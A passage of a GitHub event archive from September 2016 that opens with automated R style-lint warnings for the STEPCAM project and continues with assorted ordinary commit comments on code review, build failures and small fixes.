operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for (j in 1:n_traits) {\n^\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for (k in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:24:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:44:48:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:46:17:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for (j in 1:n_traits) {\n                ^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:47:19:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for (k in 1:pool_richness) {\n                  ^\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:48:25:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:48:28:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L48) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:48:31:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:48:36:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:44:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n^\n```\n[R/generateArtificialData.R:52:31:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:52:65:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                              traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:53:30:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:53:49:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:55:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n^\n```\n[R/generateArtificialData.R:55:16:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L55) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L56) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n^\n```\n[R/generateArtificialData.R:56:43:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                         ~^~~\n```\n[R/generateArtificialData.R:56:71:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L56) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                                                      ^\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:59:27:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                         ~^~~\n```\n[R/generateArtificialData.R:59:31:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L59) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                              ^\n```\n[R/generateArtificialData.R:59:51:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                                                  ^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:60:63:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n                                                              ^~\n```\n[R/generateArtificialData.R:61:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L61) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:61:29:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n^\n```\n[R/generateArtificialData.R:64:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L64) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:67:11:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L67) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n          ^\n```\n[R/generateArtificialData.R:67:58:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n                                                        ~^~~\n```\n[R/generateArtificialData.R:68:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L68) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L71) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:71:14:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:71:62:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:72:11:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L72) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n          ^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                        ~^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                         ^\n```\n[R/generateArtificialData.R:73:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L73) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n^\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                      cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(\n^\n```\n[R/generateArtificialData.R:77:26:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n                        ~^~~\n```\n[R/generateArtificialData.R:78:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L78) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t            as.numeric(as.matrix(comm_spec_matrix[,-ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:79:33:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:81:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L81) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:81:15:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(\n             ~^~~\n```\n[R/generateArtificialData.R:83:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L83) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:84:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L84) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:85:22:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L85) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:86:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L86) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:87:53:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:88:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L88) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:89:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L89) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots)\n^\n```\n[R/generateArtificialData.R:90:13:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L90) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n[R/generateArtificialData.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L91) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(output)\n^\n```\n"}},"created_at":"2016-09-21T15:39:35Z"}
{"id":"4597093044","type":"CommitCommentEvent","actor":{"login":"Lxido"},"repo":{"name":"Lxido/xido"},"payload":{"comment":{"id":19115825,"position":51,"line":51,"path":"test.php","commit_id":"baa3db9fc81ca8dfffddaac24720d3ff76db45e1","created_at":"2016-09-21T15:40:10Z","updated_at":"2016-09-21T15:40:10Z","body":"dfds fd  d f df"}},"created_at":"2016-09-21T15:40:10Z"}
{"id":"4597100229","type":"CommitCommentEvent","actor":{"login":"GarethNN"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":19115845,"position":5,"line":null,"path":"Script/AtomicNET/AtomicNETService/CSComponentInspector.cs","commit_id":"8b66e090812f23b998e1c25329202d6b1fa1574d","created_at":"2016-09-21T15:41:18Z","updated_at":"2016-09-21T15:41:18Z","body":"Okie doke.\r\n"}},"created_at":"2016-09-21T15:41:18Z"}
{"id":"4597113029","type":"CommitCommentEvent","actor":{"login":"ExSport"},"repo":{"name":"kodi-czsk/plugin.video.sosac.ph"},"payload":{"comment":{"id":19115870,"position":null,"line":null,"path":null,"commit_id":"224d227be7a3710ae683012389e3f3cb5cb3ed1a","created_at":"2016-09-21T15:43:12Z","updated_at":"2016-09-21T15:43:12Z","body":"Dalsi postreh.\r\nScraper musi byt aktivni na slozce Filmy a bezet zaroven s importem=\"add-all-to-library\". Vypada to, ze kdyz jsem to pustil bokem na serialech, tak to nekolidovalo.\r\nImport se pak novych .strm i update knihovny pomoci scraperu viditelne mezi sebou \"bije\" - oboje se vyrazne zpomali:\r\n![image](https://cloud.githubusercontent.com/assets/1260408/18717894/d8a2bc5c-8021-11e6-84da-2c2cd6bada00.png)\r\nPusteni obojiho separatne bezi velmi rychle (dal jsem scrapovani pouze z lokalnich .NFO pro urychleni), ale jak se jedna vec potka s druhou, tak jakoby si to vzajemne davalo prednost kdo driv muze....\r\n**OT:** Btw. jsem si pri tom vsiml bugu, co se projevuje na Widlich:\r\nhttps://bugs.python.org/issue706263\r\n```\r\nfrom __future__ import print_function\r\nimport sys\r\nif sys.executable.endswith(\"pythonw.exe\"):\r\n    sys.stdout = sys.stdout = None\r\nprint(\"can handle sys.stdout = None just fine.\")\r\n```\r\nTento kod opravdu funguje...kdyztak vytvorim pull bokem, pokud nebude nekdo rychlejsi nebo @lubomir-kucera ci @lzoubek nevyjadri nazor, ze to stejne nemergne a at se radsi nahradi printy loggerem..."}},"created_at":"2016-09-21T15:43:12Z"}
{"id":"4597114493","type":"CommitCommentEvent","actor":{"login":"NeatElves"},"repo":{"name":"ACID-Scripts/WOTLK"},"payload":{"comment":{"id":19115874,"position":null,"line":null,"path":null,"commit_id":"c3dd75551c9a2c4260fa9282b4c503c37aa9fa8e","created_at":"2016-09-21T15:43:26Z","updated_at":"2016-09-21T15:43:26Z","body":"missing Q 8354 - Npc 6741 ))"}},"created_at":"2016-09-21T15:43:26Z"}
{"id":"4597115798","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19115878,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T15:43:37Z","updated_at":"2016-09-21T15:43:37Z","body":"``get_name_map()`` was literally only calling ``_get_name_map()``, yeah. I don't know why it was done either, it was changed in 020b20e initially."}},"created_at":"2016-09-21T15:43:37Z"}
{"id":"4597118441","type":"CommitCommentEvent","actor":{"login":"hvelarde"},"repo":{"name":"collective/buildout.plonetest"},"payload":{"comment":{"id":19115884,"position":null,"line":null,"path":null,"commit_id":"664322e0a5f07ba13b30971bfca32d42125db86d","created_at":"2016-09-21T15:44:02Z","updated_at":"2016-09-21T15:44:02Z","body":"but we can remove it from all Plone 5 configurations, right?"}},"created_at":"2016-09-21T15:44:02Z"}
{"id":"4597118824","type":"CommitCommentEvent","actor":{"login":"HOMEwyj"},"repo":{"name":"HOMEwyj/C_sharp"},"payload":{"comment":{"id":19115886,"position":null,"line":null,"path":null,"commit_id":"83b61eaf523a29bc7edbf3ebc29ab36182364cbf","created_at":"2016-09-21T15:44:06Z","updated_at":"2016-09-21T15:44:06Z","body":"update"}},"created_at":"2016-09-21T15:44:06Z"}
{"id":"4597123837","type":"CommitCommentEvent","actor":{"login":"joseph-robertson"},"repo":{"name":"NREL/OpenStudio-BEopt"},"payload":{"comment":{"id":19115893,"position":null,"line":null,"path":null,"commit_id":"745de0a2c13e2776461c3fd20119b2a31835d73a","created_at":"2016-09-21T15:44:52Z","updated_at":"2016-09-21T15:44:52Z","body":"I updated hvac.rb for new MSHP measure, so we'll have to update that resource file as well to be able to run this measure."}},"created_at":"2016-09-21T15:44:52Z"}
{"id":"4597124819","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":19115897,"position":null,"line":null,"path":null,"commit_id":"dd363f081e9108129ec53119b650e97b7310483d","created_at":"2016-09-21T15:45:00Z","updated_at":"2016-09-21T15:45:00Z","body":"Está ben:\r\n - aprendestes a usar templates\r\n - aprendestes a usar tags\r\nPodes mellorar:\r\n - evitar mezclar lenguajes: evita os tags, é código HTML dentro dunha clase Java, intenta facelo todo con templates."}},"created_at":"2016-09-21T15:45:00Z"}
{"id":"4597125706","type":"CommitCommentEvent","actor":{"login":"kerel-fs"},"repo":{"name":"kerel-fs/skylines"},"payload":{"comment":{"id":19115899,"position":null,"line":null,"path":null,"commit_id":"583c37c5b60da074a1c2d39837d736e459af8e1c","created_at":"2016-09-21T15:45:09Z","updated_at":"2016-09-21T15:45:09Z","body":"No, it's just a copy-and-paste error."}},"created_at":"2016-09-21T15:45:09Z"}
{"id":"4597126077","type":"CommitCommentEvent","actor":{"login":"pascalgrimaud"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19115901,"position":256,"line":1274,"path":"generators/generator-base.js","commit_id":"7c72054d786ae2c91823769a31d4e7774bbc9ab3","created_at":"2016-09-21T15:45:12Z","updated_at":"2016-09-21T15:45:12Z","body":"No problem man! :-)\nLe 21 sept. 2016 5:14 PM, \"Deepu K Sasidharan\" <notifications@github.com> a\nécrit :\n\n> sorry guys im pushing a fix now\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jhipster/generator-jhipster/commit/7c72054d786ae2c91823769a31d4e7774bbc9ab3#commitcomment-19115370>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIu5Ejbzs7pdXI0c0DS5PXxSYMyYPLloks5qsUnVgaJpZM4KC4mp>\n> .\n>\n"}},"created_at":"2016-09-21T15:45:12Z"}
{"id":"4597127789","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19115905,"position":null,"line":null,"path":null,"commit_id":"ec8ac2f0f257bee0ed8a21889f8e1933f6209791","created_at":"2016-09-21T15:45:28Z","updated_at":"2016-09-21T15:45:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1087](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13801&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 227, ignored: 3 Build time: 00:08:42\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-21T15:45:28Z"}
{"id":"4597128785","type":"CommitCommentEvent","actor":{"login":"Bananeweizen"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19115910,"position":null,"line":null,"path":null,"commit_id":"7559115d3c496d341045e27e5b1000d7d4a50877","created_at":"2016-09-21T15:45:36Z","updated_at":"2016-09-21T15:45:36Z","body":"BTW: I've meanwhile changed the implementation to fetch 20, if GC is active, and 100 if not. Should be a good compromise for both use cases then."}},"created_at":"2016-09-21T15:45:36Z"}
{"id":"4597129298","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"endlessm/eos-desktop"},"payload":{"comment":{"id":19115911,"position":51,"line":774,"path":"js/ui/windowManager.js","commit_id":"a41f7d46e3516cd4fb4c7bd36579371aac19e605","created_at":"2016-09-21T15:45:41Z","updated_at":"2016-09-21T15:45:41Z","body":"question - does defining functions inside functions here carry with it a performance penalty? e.g., having to create a new function object?\r\n\r\nOr is this one of those \"it might do that but we don't particularly care\" cases. I don't mind either way, just wanted to know what the prevailing policy was on this. "}},"created_at":"2016-09-21T15:45:41Z"}
{"id":"4597132216","type":"CommitCommentEvent","actor":{"login":"ronaldddilley"},"repo":{"name":"USGS-EROS/espa-product-formatter"},"payload":{"comment":{"id":19115919,"position":86,"line":625,"path":"raw_binary/format_conversion_libs/espa_geoloc.c","commit_id":"1e42a388105e5ceadce0f09fd1cd737ba3dd56e0","created_at":"2016-09-21T15:46:09Z","updated_at":"2016-09-21T15:46:09Z","body":"I agree, I think this catches the prime meridian as well.  Then I think the bounding box searching below would be messed up."}},"created_at":"2016-09-21T15:46:09Z"}
